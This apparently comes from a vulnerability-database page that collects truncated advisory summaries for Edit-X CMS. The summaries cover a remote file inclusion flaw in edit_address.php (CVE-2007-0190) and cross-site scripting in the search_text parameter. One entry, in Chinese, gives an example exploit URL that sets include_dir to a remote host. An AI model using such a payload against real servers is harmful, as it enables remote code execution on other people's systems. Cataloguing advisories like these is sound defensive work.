EUVD-2007-0192

Malware in sbrugna...

Edit-X Edit_Address.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying...

XSS vulnerability in Edit-X CMS

Vulnerability ID: HTB22542 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityineditxcms.html Product: Edit-X CMS Vendor: Edit-X, Inc. http://www.edit-x.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerability Type: XSS Cro...

Edit-X PHP CMS - 'search_text' Cross-Site Scripting

source: https://www.securityfocus.com/bid/42442/info Edit-X PHP CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the contex...

Edit-X PHP CMS - search_text Cross-Site Scripting

Edit-X PHP CMS - searchtext Cross-Site Scripting source: https://www.securityfocus.com/bid/42442/info Edit-X PHP CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in...

Edit-X CMS Cross Site Scripting

Vulnerability ID: HTB22542 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityineditxcms.html Product: Edit-X CMS Vendor: Edit-X, Inc. http://www.edit-x.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerability Type: XSS Cro...

Cross-site Scripting (XSS) Vulnerability in Edit-X CMS

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Edit-X CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerability in Edit-X CMS The vulnerability exists due to input sanitation error in the "searchtext" parameter in...

Edit-X Edit_Address.PHP远程文件包含漏洞

edit-x是一款基于PHP的WEB应用程序。 edit-x不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'EditAddress.PHP'脚本对用户提交的'includedir'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 edit-x 目前没有解决方案提供： http://www.edit-x.com/ http://www.example.com/editxPATH/editx/editaddress.php?includedir=HTTP://www.example2.com...

editx-rfi.txt

============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: edit x Vendor : http://www.edit-x.com Method: file inclusion Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and...

CVE-2007-0190

PHP remote file inclusion vulnerability in editaddress.php in edit-x ecommerce allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter...

CVE-2007-0190

CVE-2007-0190 is a PHP remote file inclusion vulnerability in the edit_address.php component of the edit-x ecommerce platform. An attacker can force the application to include a remote URL via the include_dir parameter, enabling arbitrary PHP code execution on the server. Affected product: edit-x...

CVE-2007-0190

PHP remote file inclusion vulnerability in editaddress.php in edit-x ecommerce allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter...

edit-x ecommerce (include_dir) Remote File include

============================ HItamputih Crew ==================== hitamputih Advisory Discovered By : IbnuSina ----------------------------------------------------------- Software: edit x Vendor : http://www.edit-x.com Method: file inclusion Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and...

Edit-X - Edit_Address.php Remote File Inclusion

Edit-X - EditAddress.php Remote File Inclusion source: https://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and th...

Edit-X - 'Edit_Address.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also...